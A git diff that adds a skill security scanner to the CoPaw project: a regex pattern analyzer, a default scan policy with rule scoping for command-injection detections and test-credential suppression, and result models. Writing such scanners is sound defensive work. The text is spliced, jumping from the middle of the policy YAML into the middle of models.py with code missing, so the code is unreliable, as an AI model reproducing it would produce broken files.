a/src/copaw/security/__init__.py b/src/copaw/security/__init__.py index d2367e231..61e1d0674 100644 --- a/src/copaw/security/__init__.py +++ b/src/copaw/security/__init__.py @@ -7,6 +7,8 @@ * **Tool-call guarding** (``copaw.security.tool_guard``) Pre-execution parameter scanning to detect dangerous tool usage patterns (command injection, data exfiltration, etc.). +* **Skill scanning** (``copaw.security.skill_scanner``) + Static analysis of skill directories before install / activation. Sub-modules are kept independent so each concern can evolve (or be disabled) without affecting the others. Import-time cost is near-zero diff --git a/src/copaw/security/skill_scanner/__init__.py b/src/copaw/security/skill_scanner/__init__.py new file mode 100644 index 000000000..bf153a9ef --- /dev/null +++ b/src/copaw/security/skill_scanner/__init__.py @@ -0,0 +1,504 @@ +# -*- coding: utf-8 -*- +""" +Skill security scanner for CoPaw. + +Scans skills for security threats before they are activated or installed. + +Architecture +~~~~~~~~~~~~ + +The scanner follows a lightweight, extensible design: + +* **BaseAnalyzer** - abstract interface every analyzer must implement. +* **PatternAnalyzer** - YAML regex-signature matching (fast, line-based). +* **SkillScanner** - orchestrator that runs registered analyzers and + aggregates findings into a :class:`ScanResult`. + +This branch intentionally ships the baseline pattern analyzer only. +Additional analyzers can be plugged in later without changing the +orchestrator. 
+
+Quick start::
+
+    from copaw.security.skill_scanner import SkillScanner
+
+    scanner = SkillScanner()
+    result = scanner.scan_skill("/path/to/skill_directory")
+    if not result.is_safe:
+        print(f"Blocked: {result.max_severity.value} findings detected")
+"""
+from __future__ import annotations
+
+from concurrent import futures
+import hashlib
+import json
+import logging
+import os
+import threading
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from pathlib import Path
+from typing import Any
+
+from .models import (
+    Finding,
+    ScanResult,
+    Severity,
+    SkillFile,
+    ThreatCategory,
+)
+from .scan_policy import ScanPolicy
+from .analyzers import BaseAnalyzer
+from .analyzers.pattern_analyzer import PatternAnalyzer
+from .scanner import SkillScanner
+
+logger = logging.getLogger(__name__)
+
+__all__ = [
+    "BaseAnalyzer",
+    "BlockedSkillRecord",
+    "Finding",
+    "PatternAnalyzer",
+    "ScanPolicy",
+    "ScanResult",
+    "Severity",
+    "SkillFile",
+    "SkillScanner",
+    "SkillScanError",
+    "ThreatCategory",
+    "compute_skill_content_hash",
+    "get_blocked_history",
+    "clear_blocked_history",
+    "remove_blocked_entry",
+    "is_skill_whitelisted",
+    "scan_skill_directory",
+]
+
+# ---------------------------------------------------------------------------
+# Config helpers
+# ---------------------------------------------------------------------------
+
+
+_VALID_MODES = {"block", "warn", "off"}
+
+
+def _load_scanner_config() -> Any:
+    """Load SkillScannerConfig from the app config (lazy import)."""
+    try:
+        from ...config import load_config
+
+        return load_config().security.skill_scanner
+    except Exception:
+        return None
+
+
+def _get_scan_mode(cfg: Any = None) -> str:
+    """Return the effective scan mode: ``block``, ``warn``, or ``off``.
+
+    Priority: env ``COPAW_SKILL_SCAN_MODE`` > config > fallback ``block``.
+ """ + env = os.environ.get("COPAW_SKILL_SCAN_MODE") + if env is not None: + val = env.lower().strip() + if val in _VALID_MODES: + return val + if cfg is None: + cfg = _load_scanner_config() + return cfg.mode if cfg is not None else "block" + + +def _scan_timeout(cfg: Any = None) -> float: + if cfg is None: + cfg = _load_scanner_config() + return float(cfg.timeout) if cfg is not None else 30.0 + + +# --------------------------------------------------------------------------- +# Content hash +# --------------------------------------------------------------------------- + + +def compute_skill_content_hash(skill_dir: Path) -> str: + """SHA-256 hash of all regular file contents in *skill_dir* (sorted).""" + h = hashlib.sha256() + try: + for p in sorted(skill_dir.rglob("*")): + if p.is_file() and not p.is_symlink(): + try: + h.update(p.read_bytes()) + except OSError: + pass + except OSError: + pass + return h.hexdigest() + + +# --------------------------------------------------------------------------- +# Whitelist helpers +# --------------------------------------------------------------------------- + + +def is_skill_whitelisted( + skill_name: str, + skill_dir: Path | None = None, + *, + cfg: Any = None, +) -> bool: + """Return True if *skill_name* is on the whitelist. + + When a whitelist entry has a non-empty ``content_hash``, the hash must + match the current directory contents for the entry to apply. 
+ """ + if cfg is None: + cfg = _load_scanner_config() + if cfg is None: + return False + for entry in cfg.whitelist: + if entry.skill_name != skill_name: + continue + if not entry.content_hash: + return True + if skill_dir is not None: + current_hash = compute_skill_content_hash(skill_dir) + if current_hash == entry.content_hash: + return True + else: + return True + return False + + +# --------------------------------------------------------------------------- +# Blocked history persistence +# --------------------------------------------------------------------------- + +_BLOCKED_HISTORY_FILE = "skill_scanner_blocked.json" +_history_lock = threading.Lock() + + +def _get_blocked_history_path() -> Path: + try: + from ...constant import WORKING_DIR + + return WORKING_DIR / _BLOCKED_HISTORY_FILE + except Exception: + return Path.home() / ".copaw" / _BLOCKED_HISTORY_FILE + + +@dataclass +class BlockedSkillRecord: + """A record of a scan alert (blocked or warned).""" + + skill_name: str + blocked_at: str + max_severity: str + findings: list[dict[str, Any]] = field(default_factory=list) + content_hash: str = "" + action: str = "blocked" + + def to_dict(self) -> dict[str, Any]: + return { + "skill_name": self.skill_name, + "blocked_at": self.blocked_at, + "max_severity": self.max_severity, + "findings": self.findings, + "content_hash": self.content_hash, + "action": self.action, + } + + @classmethod + def from_dict(cls, data: dict[str, Any]) -> BlockedSkillRecord: + return cls( + skill_name=data.get("skill_name", ""), + blocked_at=data.get("blocked_at", ""), + max_severity=data.get("max_severity", ""), + findings=data.get("findings", []), + content_hash=data.get("content_hash", ""), + action=data.get("action", "blocked"), + ) + + +def _finding_to_dict(f: Finding) -> dict[str, Any]: + return { + "severity": f.severity.value, + "title": f.title, + "description": f.description, + "file_path": f.file_path, + "line_number": f.line_number, + "rule_id": f.rule_id, + } + + +def 
_record_blocked_skill( + result: ScanResult, + skill_dir: Path, + *, + action: str = "blocked", +) -> None: + """Append a scan alert to the history file.""" + record = BlockedSkillRecord( + skill_name=result.skill_name, + blocked_at=datetime.now(timezone.utc).isoformat(), + max_severity=result.max_severity.value, + findings=[_finding_to_dict(f) for f in result.findings], + content_hash=compute_skill_content_hash(skill_dir), + action=action, + ) + path = _get_blocked_history_path() + with _history_lock: + try: + existing: list[dict[str, Any]] = [] + if path.is_file(): + existing = json.loads(path.read_text(encoding="utf-8")) + existing.append(record.to_dict()) + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text( + json.dumps(existing, indent=2, ensure_ascii=False), + encoding="utf-8", + ) + except Exception as exc: + logger.warning("Failed to record blocked skill: %s", exc) + + +def get_blocked_history() -> list[BlockedSkillRecord]: + """Load all blocked skill records from disk.""" + path = _get_blocked_history_path() + if not path.is_file(): + return [] + try: + data = json.loads(path.read_text(encoding="utf-8")) + return [BlockedSkillRecord.from_dict(d) for d in data] + except Exception as exc: + logger.warning("Failed to load blocked history: %s", exc) + return [] + + +def clear_blocked_history() -> None: + """Delete all blocked skill records.""" + path = _get_blocked_history_path() + try: + if path.is_file(): + path.unlink() + except OSError as exc: + logger.warning("Failed to clear blocked history: %s", exc) + + +def remove_blocked_entry(index: int) -> bool: + """Remove a single blocked record by index. 
Returns True on success.""" + path = _get_blocked_history_path() + if not path.is_file(): + return False + try: + data = json.loads(path.read_text(encoding="utf-8")) + if 0 <= index < len(data): + data.pop(index) + path.write_text( + json.dumps(data, indent=2, ensure_ascii=False), + encoding="utf-8", + ) + return True + return False + except Exception as exc: + logger.warning("Failed to remove blocked entry: %s", exc) + return False + + +# --------------------------------------------------------------------------- +# Lazy singleton (thread-safe) +# --------------------------------------------------------------------------- + +_scanner_instance: SkillScanner | None = None +_scanner_lock = threading.Lock() + + +def _get_scanner() -> SkillScanner: + """Return a lazily-initialised :class:`SkillScanner` singleton.""" + global _scanner_instance + if _scanner_instance is None: + with _scanner_lock: + if _scanner_instance is None: + _scanner_instance = SkillScanner() + return _scanner_instance + + +# --------------------------------------------------------------------------- +# Scan result cache (mtime-based) +# --------------------------------------------------------------------------- + +_MAX_CACHE_ENTRIES = 64 +_scan_cache: dict[str, tuple[float, ScanResult]] = {} +_cache_lock = threading.Lock() + + +def _get_dir_mtime(skill_dir: Path) -> float: + """Return the latest mtime among the directory and its immediate files.""" + try: + latest = skill_dir.stat().st_mtime + except OSError: + return 0.0 + try: + for p in skill_dir.iterdir(): + if p.is_file() and not p.is_symlink(): + latest = max(latest, p.stat().st_mtime) + except OSError: + pass + return latest + + +def _get_cached_result( + skill_dir: Path, +) -> ScanResult | None: + """Return a cached ScanResult if the directory hasn't changed.""" + key = str(skill_dir) + with _cache_lock: + entry = _scan_cache.get(key) + if entry is None: + return None + cached_mtime, cached_result = entry + current_mtime = 
_get_dir_mtime(skill_dir) + if current_mtime == cached_mtime: + logger.debug( + "Returning cached scan result for '%s'", + cached_result.skill_name, + ) + return cached_result + return None + + +def _store_cached_result( + skill_dir: Path, + result: ScanResult, +) -> None: + """Store a scan result in the cache (LRU eviction).""" + key = str(skill_dir) + mtime = _get_dir_mtime(skill_dir) + with _cache_lock: + _scan_cache.pop(key, None) + _scan_cache[key] = (mtime, result) + while len(_scan_cache) > _MAX_CACHE_ENTRIES: + oldest = next(iter(_scan_cache)) + del _scan_cache[oldest] + + +# --------------------------------------------------------------------------- +# Public API +# --------------------------------------------------------------------------- + + +def _format_finding_location(f: Finding) -> str: + if f.line_number is not None: + return f"({f.file_path}:{f.line_number})" + return f"({f.file_path})" + + +class SkillScanError(Exception): + """Raised when a skill fails a security scan and blocking is enabled.""" + + def __init__(self, result: ScanResult) -> None: + self.result = result + findings_summary = "; ".join( + f"[{f.severity.value}] {f.title} " f"{_format_finding_location(f)}" + for f in result.findings[:5] + ) + truncated = ( + f" (and {len(result.findings) - 5} more)" + if len(result.findings) > 5 + else "" + ) + super().__init__( + f"Security scan of skill '{result.skill_name}' found " + f"{len(result.findings)} issue(s) " + f"(max severity: {result.max_severity.value}): " + f"{findings_summary}{truncated}", + ) + + +def scan_skill_directory( + skill_dir: str | Path, + *, + skill_name: str | None = None, + block: bool | None = None, + timeout: float | None = None, +) -> ScanResult | None: + """Scan a skill directory and optionally block on unsafe results. + + Parameters + ---------- + skill_dir: + Path to the skill directory to scan. + skill_name: + Human-readable name (falls back to directory name). 
+ block: + Whether to raise :class:`SkillScanError` when the scan finds + CRITICAL/HIGH issues. *None* means use the configured mode + (``block`` mode → True, ``warn`` mode → False). + timeout: + Maximum seconds to wait for the scan to complete before + giving up and returning ``None``. *None* reads from config. + + Returns + ------- + ScanResult or None + ``None`` when scanning is disabled, whitelisted, or timed out. + + Raises + ------ + SkillScanError + When blocking is enabled and the skill is deemed unsafe. + """ + cfg = _load_scanner_config() + mode = _get_scan_mode(cfg) + if mode == "off": + return None + + resolved = Path(skill_dir).resolve() + effective_name = skill_name or resolved.name + + if is_skill_whitelisted(effective_name, resolved, cfg=cfg): + logger.debug( + "Skill '%s' is whitelisted, skipping scan", + effective_name, + ) + return None + + effective_timeout = timeout if timeout is not None else _scan_timeout(cfg) + + cached = _get_cached_result(resolved) + if cached is not None: + result = cached + else: + scanner = _get_scanner() + + with futures.ThreadPoolExecutor(max_workers=1) as executor: + future = executor.submit( + scanner.scan_skill, + resolved, + skill_name=skill_name, + ) + try: + result = future.result(timeout=effective_timeout) + except futures.TimeoutError: + logger.warning( + "Security scan of skill '%s' timed out after %.0fs", + effective_name, + effective_timeout, + ) + future.cancel() + return None + + _store_cached_result(resolved, result) + + if not result.is_safe: + should_block = block if block is not None else (mode == "block") + if should_block: + _record_blocked_skill(result, resolved, action="blocked") + raise SkillScanError(result) + _record_blocked_skill(result, resolved, action="warned") + logger.warning( + "Skill '%s' has %d security finding(s) (max severity: %s) " + "but blocking is disabled – proceeding anyway.", + result.skill_name, + len(result.findings), + result.max_severity.value, + ) + + return result diff 
--git a/src/copaw/security/skill_scanner/analyzers/__init__.py b/src/copaw/security/skill_scanner/analyzers/__init__.py new file mode 100644 index 000000000..8096c3712 --- /dev/null +++ b/src/copaw/security/skill_scanner/analyzers/__init__.py @@ -0,0 +1,89 @@ +# -*- coding: utf-8 -*- +"""Abstract base class for all security analyzers. + +Every analyzer must subclass :class:`BaseAnalyzer` and implement +:meth:`analyze`. The interface is intentionally minimal so that +new detection engines (e.g. LLM-based, behavioural dataflow) can be +added as drop-in plugins without touching the scanner orchestrator. +""" +from __future__ import annotations + +from abc import ABC, abstractmethod +from pathlib import Path +from typing import TYPE_CHECKING + +from ..models import Finding, SkillFile + +if TYPE_CHECKING: + from ..scan_policy import ScanPolicy + + +class BaseAnalyzer(ABC): + """Abstract base class for all security analyzers. + + Parameters + ---------- + name: + Human-readable analyzer name (used in :attr:`Finding.analyzer`). + policy: + Optional :class:`ScanPolicy` for org-specific rule scoping, + severity overrides, and allowlists. When *None*, analysers + use their own built-in defaults. + """ + + def __init__( + self, + name: str, + *, + policy: "ScanPolicy | None" = None, + ) -> None: + self.name = name + # Lazily import to avoid circular dependencies + if policy is None: + from ..scan_policy import ScanPolicy + + policy = ScanPolicy.default() + self._policy = policy + + @property + def policy(self) -> "ScanPolicy": + """The active scan policy.""" + return self._policy + + # ------------------------------------------------------------------ + # Abstract interface + # ------------------------------------------------------------------ + + @abstractmethod + def analyze( + self, + skill_dir: Path, + files: list[SkillFile], + *, + skill_name: str | None = None, + ) -> list[Finding]: + """Analyze a skill package for security issues. 
+ + Parameters + ---------- + skill_dir: + Root directory of the skill. + files: + Pre-discovered list of :class:`SkillFile` objects belonging + to the skill. + skill_name: + Optional skill name for richer finding messages. + + Returns + ------- + list[Finding] + Findings discovered by this analyzer. + """ + + # ------------------------------------------------------------------ + # Helpers + # ------------------------------------------------------------------ + + def get_name(self) -> str: # noqa: D401 + """Analyzer name.""" + return self.name diff --git a/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py b/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py new file mode 100644 index 000000000..8df88af54 --- /dev/null +++ b/src/copaw/security/skill_scanner/analyzers/pattern_analyzer.py @@ -0,0 +1,392 @@ +# -*- coding: utf-8 -*- +"""YAML-signature pattern matching analyzer. + +Loads security rules from YAML files (see ``rules/signatures/``) and +performs fast, line-based regex matching with a multiline fallback for +patterns that intentionally span newlines. +""" +from __future__ import annotations + +import logging +import re +from pathlib import Path +from typing import Any + +import yaml + +from ..models import Finding, Severity, SkillFile, ThreatCategory +from ..scan_policy import ScanPolicy +from . import BaseAnalyzer + +logger = logging.getLogger(__name__) + +# Matches character-class contents so we can tell whether ``\n`` in a +# pattern is genuinely multiline vs. ``[^\n]``. +_CHAR_CLASS_RE = re.compile(r"\[[^\]]*\]") + +# Default signatures directory (shipped with the package). 
+_DEFAULT_SIGNATURES_DIR = ( + Path(__file__).resolve().parent.parent / "rules" / "signatures" +) + + +# --------------------------------------------------------------------------- +# SecurityRule – one YAML rule entry +# --------------------------------------------------------------------------- + + +class SecurityRule: + """A single regex-based security detection rule.""" + + __slots__ = ( + "id", + "category", + "severity", + "patterns", + "exclude_patterns", + "file_types", + "description", + "remediation", + "compiled_patterns", + "compiled_exclude_patterns", + ) + + def __init__(self, rule_data: dict[str, Any]) -> None: + self.id: str = rule_data["id"] + self.category = ThreatCategory(rule_data["category"]) + self.severity = Severity(rule_data["severity"]) + self.patterns: list[str] = rule_data["patterns"] + self.exclude_patterns: list[str] = rule_data.get( + "exclude_patterns", + [], + ) + self.file_types: list[str] = rule_data.get("file_types", []) + self.description: str = rule_data["description"] + self.remediation: str = rule_data.get("remediation", "") + + self.compiled_patterns: list[re.Pattern[str]] = [] + for pat in self.patterns: + try: + self.compiled_patterns.append(re.compile(pat)) + except re.error as exc: + logger.warning("Bad regex in rule %s: %s", self.id, exc) + + self.compiled_exclude_patterns: list[re.Pattern[str]] = [] + for pat in self.exclude_patterns: + try: + self.compiled_exclude_patterns.append(re.compile(pat)) + except re.error as exc: + logger.warning( + "Bad exclude regex in rule %s: %s", + self.id, + exc, + ) + + # ------------------------------------------------------------------ + + def matches_file_type(self, file_type: str) -> bool: + """Return *True* if this rule applies to *file_type*.""" + if not self.file_types: + return True + return file_type in self.file_types + + def scan_content( + self, + content: str, + file_path: str | None = None, + ) -> list[dict[str, Any]]: + """Scan *content* for rule violations. 
+ + Returns a list of match dicts with ``line_number``, ``line_content``, + ``matched_pattern``, ``matched_text``, and ``file_path``. + """ + matches: list[dict[str, Any]] = [] + lines = content.split("\n") + + # --- Pass 1: line-based matching (fast) -------------------------- + for line_num, line in enumerate(lines, start=1): + excluded = any( + ep.search(line) for ep in self.compiled_exclude_patterns + ) + if excluded: + continue + for pattern in self.compiled_patterns: + m = pattern.search(line) + if m: + matches.append( + { + "line_number": line_num, + "line_content": line.strip(), + "matched_pattern": pattern.pattern, + "matched_text": m.group(0), + "file_path": file_path, + }, + ) + + # --- Pass 2: multiline patterns ---------------------------------- + for pattern in self.compiled_patterns: + stripped = _CHAR_CLASS_RE.sub("", pattern.pattern) + if "\\n" not in stripped: + continue + for m in pattern.finditer(content): + matched_text = m.group(0) + excluded = any( + ep.search(matched_text) + for ep in self.compiled_exclude_patterns + ) + if excluded: + continue + start_line = content.count("\n", 0, m.start()) + 1 + snippet = ( + lines[start_line - 1].strip() + if 0 <= start_line - 1 < len(lines) + else "" + ) + matches.append( + { + "line_number": start_line, + "line_content": snippet, + "matched_pattern": pattern.pattern, + "matched_text": matched_text[:200], + "file_path": file_path, + }, + ) + + return matches + + +# --------------------------------------------------------------------------- +# RuleLoader +# --------------------------------------------------------------------------- + + +class RuleLoader: + """Loads :class:`SecurityRule` objects from YAML files.""" + + def __init__(self, rules_path: Path | None = None) -> None: + self.rules_path = rules_path or _DEFAULT_SIGNATURES_DIR + self.rules: list[SecurityRule] = [] + self.rules_by_id: dict[str, SecurityRule] = {} + self.rules_by_category: dict[ThreatCategory, list[SecurityRule]] = {} + + def 
load_rules(self) -> list[SecurityRule]: + """Load and index all rules from the configured path.""" + path = Path(self.rules_path) + if path.is_dir(): + raw: list[dict[str, Any]] = [] + for yaml_file in sorted(path.glob("*.yaml")): + try: + with open(yaml_file, encoding="utf-8") as fh: + data = yaml.safe_load(fh) + except Exception as exc: + raise RuntimeError( + f"Failed to load {yaml_file}: {exc}", + ) from exc + if not isinstance(data, list): + raise RuntimeError(f"Expected list in {yaml_file}") + raw.extend(data) + else: + try: + with open(path, encoding="utf-8") as fh: + raw = yaml.safe_load(fh) + except Exception as exc: + raise RuntimeError(f"Failed to load {path}: {exc}") from exc + if not isinstance(raw, list): + raise RuntimeError(f"Expected list in {path}") + + self.rules = [] + self.rules_by_id = {} + self.rules_by_category = {} + + for entry in raw: + try: + rule = SecurityRule(entry) + self.rules.append(rule) + self.rules_by_id[rule.id] = rule + self.rules_by_category.setdefault(rule.category, []).append( + rule, + ) + except Exception as exc: + logger.warning( + "Skipping rule %s: %s", + entry.get("id", "?"), + exc, + ) + + return self.rules + + def get_rule(self, rule_id: str) -> SecurityRule | None: + return self.rules_by_id.get(rule_id) + + def get_rules_for_file_type(self, file_type: str) -> list[SecurityRule]: + return [r for r in self.rules if r.matches_file_type(file_type)] + + def get_rules_for_category( + self, + category: ThreatCategory, + ) -> list[SecurityRule]: + return self.rules_by_category.get(category, []) + + +# --------------------------------------------------------------------------- +# PatternAnalyzer +# --------------------------------------------------------------------------- + + +class PatternAnalyzer(BaseAnalyzer): + """Analyzer that matches YAML regex signatures against skill files. + + Parameters + ---------- + rules_path: + Path to a YAML file or a directory of YAML files. 
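`load_rules` above insists that every rule file parses to a top-level list, and wraps parse failures in `RuntimeError` with the offending path. A stdlib-only sketch of the same contract — it uses `json` as a stand-in for `yaml.safe_load` so the example runs without PyYAML, and the file names are illustrative:

```python
import json
import tempfile
from pathlib import Path


def load_rule_file(path: Path) -> list[dict]:
    """Parse a rule file and enforce the top-level-list contract."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except Exception as exc:
        # Same wrapping as RuleLoader: keep the file path in the error.
        raise RuntimeError(f"Failed to load {path}: {exc}") from exc
    if not isinstance(data, list):
        raise RuntimeError(f"Expected list in {path}")
    return data


with tempfile.TemporaryDirectory() as tmp:
    good = Path(tmp) / "good.json"
    good.write_text(json.dumps([{"id": "R1"}, {"id": "R2"}]), encoding="utf-8")
    loaded = load_rule_file(good)

    bad = Path(tmp) / "bad.json"
    bad.write_text(json.dumps({"id": "R1"}), encoding="utf-8")  # dict, not list
    try:
        load_rule_file(bad)
        rejected = False
    except RuntimeError:
        rejected = True
```

Failing fast on a malformed file (rather than skipping it like a malformed single rule) is deliberate: a file-level problem usually means the whole signature set is suspect.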
Defaults to + the ``rules/signatures/`` directory shipped with the package. + policy: + Optional :class:`ScanPolicy` for rule disabling, severity + overrides, and doc-path skipping. + """ + + def __init__( + self, + rules_path: Path | None = None, + *, + policy: ScanPolicy | None = None, + ) -> None: + super().__init__(name="pattern", policy=policy) + loader = RuleLoader(rules_path) + self._rules = loader.load_rules() + self._rules_by_file_type: dict[str, list[SecurityRule]] = {} + logger.debug("PatternAnalyzer loaded %d rules", len(self._rules)) + + # ------------------------------------------------------------------ + # BaseAnalyzer interface + # ------------------------------------------------------------------ + + def analyze( + self, + skill_dir: Path, + files: list[SkillFile], + *, + skill_name: str | None = None, + ) -> list[Finding]: + findings: list[Finding] = [] + skip_in_docs = self.policy.rule_scoping.skip_in_docs + + for sf in files: + content = sf.read_content() + if not content: + continue + + is_doc = self.policy.is_doc_path(sf.relative_path) + + applicable = self._get_rules(sf.file_type) + for rule in applicable: + # --- Policy-based rule filtering --- + # Skip disabled rules early + if self.policy.is_rule_disabled(rule.id): + continue + # Skip doc-only exclusions + if is_doc and rule.id in skip_in_docs: + continue + # Code-only rules should not fire on non-code files + if rule.id in self.policy.rule_scoping.code_only: + if sf.file_type not in ( + "python", + "bash", + "javascript", + "typescript", + ): + continue + + matches = rule.scan_content( + content, + file_path=sf.relative_path, + ) + for match in matches: + # Apply severity override if configured + severity = rule.severity + override = self.policy.get_severity_override(rule.id) + if override: + try: + severity = Severity(override) + except ValueError: + pass + + findings.append( + Finding( + id=( + f"{rule.id}:{sf.relative_path}" + f":{match['line_number']}" + ), + rule_id=rule.id, + 
category=rule.category, + severity=severity, + title=rule.description, + description=rule.description, + file_path=sf.relative_path, + line_number=match["line_number"], + snippet=match["line_content"], + remediation=rule.remediation, + analyzer=self.name, + metadata={ + "matched_pattern": match["matched_pattern"], + "matched_text": match["matched_text"], + }, + ), + ) + + # Filter well-known test credentials + findings = [ + f for f in findings if not self._is_known_test_credential(f) + ] + + # De-duplicate if enabled in policy + if self.policy.rule_scoping.dedupe_duplicate_findings: + findings = self._dedupe_findings(findings) + + return findings + + # ------------------------------------------------------------------ + # Credential filtering + # ------------------------------------------------------------------ + + def _is_known_test_credential(self, finding: Finding) -> bool: + """Suppress findings that match known test/placeholder credentials.""" + if finding.category != ThreatCategory.HARDCODED_SECRETS: + return False + snippet = (finding.snippet or "").lower() + for cred in self.policy.credentials.known_test_values: + if cred.lower() in snippet: + return True + for marker in self.policy.credentials.placeholder_markers: + if marker.lower() in snippet: + return True + return False + + # ------------------------------------------------------------------ + # De-duplication + # ------------------------------------------------------------------ + + @staticmethod + def _dedupe_findings(findings: list[Finding]) -> list[Finding]: + """Remove exact duplicate findings (same rule + file + line).""" + seen: set[str] = set() + unique: list[Finding] = [] + for f in findings: + key = f"{f.rule_id}:{f.file_path}:{f.line_number}" + if key not in seen: + seen.add(key) + unique.append(f) + return unique + + # ------------------------------------------------------------------ + # Internals + # ------------------------------------------------------------------ + + def 
_get_rules(self, file_type: str) -> list[SecurityRule]: + """Return rules applicable to *file_type* (cached).""" + if file_type not in self._rules_by_file_type: + self._rules_by_file_type[file_type] = [ + r for r in self._rules if r.matches_file_type(file_type) + ] + return self._rules_by_file_type[file_type] diff --git a/src/copaw/security/skill_scanner/data/default_policy.yaml b/src/copaw/security/skill_scanner/data/default_policy.yaml new file mode 100644 index 000000000..c2b571d10 --- /dev/null +++ b/src/copaw/security/skill_scanner/data/default_policy.yaml @@ -0,0 +1,244 @@ +# CoPaw Skill Scanner – Default Scan Policy +# ============================================ +# This file defines the built-in security policy. Every setting here can be +# overridden in an organisation-specific policy file passed via --policy. +# +# To use a custom policy: +# scanner = SkillScanner(policy=ScanPolicy.from_yaml("my_org_policy.yaml")) + +policy_name: default +policy_version: "1.0" +preset_base: balanced + +# --------------------------------------------------------------------------- +# Hidden files – which dotfiles and dotdirs are considered benign +# --------------------------------------------------------------------------- +hidden_files: + benign_dotfiles: + - ".gitignore" + - ".gitattributes" + - ".gitmodules" + - ".gitkeep" + - ".editorconfig" + - ".prettierrc" + - ".prettierignore" + - ".eslintrc" + - ".eslintignore" + - ".eslintrc.json" + - ".eslintrc.js" + - ".eslintrc.yml" + - ".npmrc" + - ".npmignore" + - ".nvmrc" + - ".node-version" + - ".python-version" + - ".ruby-version" + - ".tool-versions" + - ".flake8" + - ".pylintrc" + - ".isort.cfg" + - ".mypy.ini" + - ".babelrc" + - ".browserslistrc" + - ".dockerignore" + - ".env.example" + - ".env.sample" + - ".env.template" + - ".markdownlint.json" + - ".markdownlintignore" + - ".yamllint" + - ".yamllint.yml" + - ".cursorrules" + - ".cursorignore" + - ".clang-format" + - ".clang-tidy" + - ".mcp.json" + - ".envrc" + - 
".version" + + benign_dotdirs: + - ".github" + - ".vscode" + - ".idea" + - ".cursor" + - ".husky" + - ".circleci" + - ".gitlab" + - ".cache" + - ".tmp" + - ".data" + - ".next" + - ".nuxt" + - ".claude" + - ".devcontainer" + - ".vitepress" + - ".docusaurus" + - ".storybook" + +# --------------------------------------------------------------------------- +# Rule scoping – which rules fire where +# --------------------------------------------------------------------------- +rule_scoping: + skip_in_docs: + - "COMMAND_INJECTION_EVAL" + - "COMMAND_INJECTION_OS_SYSTEM" + - "COMMAND_INJECTION_SHELL_TRUE" + - "RESOURCE_ABUSE_INFINITE_LOOP" + + code_only: + - "COMMAND_INJECTION_EVAL" + - "COMMAND_INJECTION_OS_SYSTEM" + - "COMMAND_INJECTION_SHELL_TRUE" + - "RESOURCE_ABUSE_INFINITE_LOOP" + + doc_path_indicators: + - "docs" + - "doc" + - "examples" + - "example" + - "tutorials" + - "tutorial" + - "guides" + - "guide" + - "samples" + - "sample" + - "demo" + - "demos" + - "tests" + - "test" + + doc_filename_patterns: + - "readme" + - "example" + - "tutorial" + - "sample" + - "demo" + - "howto" + - "guide" + + dedupe_duplicate_findings: true + +# --------------------------------------------------------------------------- +# Credentials – known test/placeholder values to auto-suppress +# --------------------------------------------------------------------------- +credentials: + known_test_values: + - "test" + - "test123" + - "password" + - "changeme" + - "example" + - "dummy" + - "placeholder" + - "your-api-key" + - "your_api_key" + - "sk-test" + - "pk-test" + - "xxx" + - "abc123" + - "secret" + - "foobar" + + placeholder_markers: + - "your-" + - "your_" + - "your " + - "example" + - "sample" + - "dummy" + - "placeholder" + - "replace" + - "changeme" + - "change_me" + - " str: + """Read file content if not already loaded.""" + if self.content is None and self.path.exists(): + try: + with open(self.path, encoding="utf-8") as f: + self.content = f.read() + except (OSError, 
UnicodeDecodeError): + self.content = "" + return self.content or "" + + @property + def is_hidden(self) -> bool: + """Check if file is a dotfile or inside a hidden dir.""" + parts = Path(self.relative_path).parts + return any(part.startswith(".") and part != "." for part in parts) + + # ------------------------------------------------------------------ + # Factory helpers + # ------------------------------------------------------------------ + + @classmethod + def from_path(cls, path: Path, base_dir: Path) -> "SkillFile": + """Create a SkillFile from an on-disk path relative to *base_dir*.""" + rel = str(path.relative_to(base_dir)) + suffix = path.suffix.lower() + file_type = _FILE_TYPE_MAP.get(suffix, "other") + try: + size = path.stat().st_size + except OSError: + size = 0 + return cls( + path=path, + relative_path=rel, + file_type=file_type, + size_bytes=size, + ) + + +# --------------------------------------------------------------------------- +# Finding +# --------------------------------------------------------------------------- + + +@dataclass +class Finding: + """A security issue discovered during a skill scan.""" + + id: str + rule_id: str + category: ThreatCategory + severity: Severity + title: str + description: str + file_path: str | None = None + line_number: int | None = None + snippet: str | None = None + remediation: str | None = None + analyzer: str | None = None + metadata: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + return { + "id": self.id, + "rule_id": self.rule_id, + "category": self.category.value, + "severity": self.severity.value, + "title": self.title, + "description": self.description, + "file_path": self.file_path, + "line_number": self.line_number, + "snippet": self.snippet, + "remediation": self.remediation, + "analyzer": self.analyzer, + "metadata": self.metadata, + } + + +# --------------------------------------------------------------------------- +# Scan result +# 
--------------------------------------------------------------------------- + + +@dataclass +class ScanResult: + """Aggregated results from scanning a single skill.""" + + skill_name: str + skill_directory: str + findings: list[Finding] = field(default_factory=list) + scan_duration_seconds: float = 0.0 + analyzers_used: list[str] = field(default_factory=list) + analyzers_failed: list[dict[str, str]] = field(default_factory=list) + timestamp: datetime = field( + default_factory=lambda: datetime.now(timezone.utc), + ) + + # ------------------------------------------------------------------ + # Convenience properties + # ------------------------------------------------------------------ + + @property + def is_safe(self) -> bool: + """``True`` when there are no CRITICAL or HIGH findings.""" + return not any( + f.severity in (Severity.CRITICAL, Severity.HIGH) + for f in self.findings + ) + + @property + def max_severity(self) -> Severity: + """Return the highest severity found, or ``SAFE``.""" + if not self.findings: + return Severity.SAFE + order = [ + Severity.CRITICAL, + Severity.HIGH, + Severity.MEDIUM, + Severity.LOW, + Severity.INFO, + ] + for sev in order: + if any(f.severity == sev for f in self.findings): + return sev + return Severity.SAFE + + def get_findings_by_severity(self, severity: Severity) -> list[Finding]: + return [f for f in self.findings if f.severity == severity] + + def get_findings_by_category( + self, + category: ThreatCategory, + ) -> list[Finding]: + return [f for f in self.findings if f.category == category] + + def to_dict(self) -> dict[str, Any]: + result: dict[str, Any] = { + "skill_name": self.skill_name, + "skill_path": self.skill_directory, + "is_safe": self.is_safe, + "max_severity": self.max_severity.value, + "findings_count": len(self.findings), + "findings": [f.to_dict() for f in self.findings], + "scan_duration_seconds": self.scan_duration_seconds, + 